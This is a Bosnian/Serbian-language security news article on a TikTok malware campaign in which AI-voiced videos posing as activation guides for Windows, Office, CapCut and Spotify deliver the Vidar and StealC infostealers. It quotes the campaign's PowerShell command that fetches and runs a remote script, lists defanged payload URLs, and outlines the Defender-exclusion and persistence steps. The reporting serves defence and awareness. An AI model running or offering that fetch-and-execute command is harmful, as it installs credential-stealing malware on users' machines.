TikTok: Pazite na popularne video snimke koji promovišu piratske aplikacije jer isporučuju stealer malware

Kriminalci su otkrili novu oblast za distribuciju malvera, koristeći ogromnu bazu korisnika i algoritamski doseg TikToka.

Pojavila se sofisticirana kampanja socijalnog inženjeringa koja koristi AI generisane video snimke kako bi prevarila korisnike da preuzmu opasan malver za krađu informacija, prerušen u tutorijale za aktivaciju softvera.

Ovi obmanjujući video snimci obećavaju pomoć korisnicima oko aktivacije legitimnih aplikacija kao što su Windows OS, Microsoft Office, CapCut i Spotify, ali umjesto toga isporučuju ozloglašene kradljivce informacija Vidar i StealC nesuđenim žrtvama.

Ova kampanja predstavlja značajan napredak u metodama distribucije malvera, udaljavajući se od tradicionalnih metoda isporuke putem veba i iskorištavajući povjerenje i angažman svojstvene platformama društvenih medija.

Za razliku od uobičajenih napada koji se oslanjaju na kompromitovane veb stranice ili fišing imejlove, ova operacija ugrađuje sve elemente socijalnog inženjeringa direktno u video sadržaj, čineći detekciju znatno težom za sigurnosna rješenja.

Napadači koriste prednost viralnosti TikToka, pri čemu je jedan kompromitujući video snimak zabilježio skoro 500.000 pregleda, preko 20.000 lajkova i više od 100 komentara, što ukazuje na alarmantan doseg i efikasnost kampanje.

Analitičari Trend Micro-a identifikovali su više TikTok naloga uključenih u ovu operaciju, uključujući @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc i @digitaldreams771, koji su od tada deaktivirani.

Istraživači su primijetili da su ovi nalozi objavljivali upadljivo slične video snimke bez lica i sa AI generisanim glasovima, što sugerira automatizovani proces proizvodnje namijenjen skaliranju.

Tehnička sofisticiranost napada postaje jasna kroz njegovu metodologiju izvršenja.

Žrtvama se nalaže da otvore PowerShell i izvrše naizgled bezopasnu komandu: `iex (irm hxxps://allaivo[.]me/spotify)`. Ovaj PowerShell skript pokreće višestepeni proces infekcije koji demonstrira napredne tehnike izbjegavanja detekcije.

Mehanizam infekcije i taktike upornosti

Lanac infekcije malvera otkriva pažljivo orkestrirane korake osmišljene da osiguraju uspješnu kompromitaciju uz izbjegavanje detekcije.

Nakon izvršenja, početni PowerShell skript kreira skrivene direktorijume unutar korisnikovih APPDATA i LOCALAPPDATA foldera, odmah dodajući te lokacije na listu izuzetaka Windows Defendera kako bi se spriječilo skeniranje antivirusnog softvera.

Skript zatim preuzima primarni teret sa `hxxps://amssh[.]co/file.exe`, koji sadrži varijante malvera Vidar ili StealC.

Mehanizam upornosti uključuje preuzimanje dodatnog PowerShell skripta sa `hxxps://amssh[.]co/script[.]ps1` i uspostavljanje ključa registra koji osigurava da se malver izvršava pri pokretanju sistema.

Posebno, Vidar koristi inovativnu strategiju komande i kontrole, zloupotrebljavajući legitimne usluge kao što su Steam profili i Telegram kanali kao “Dead Drop Resolvers” kako bi prikrio stvarne adrese C&C servera, čineći napore detekcije i uklanjanja znatno složenijim.

Recent Articles

spot_img

Related Stories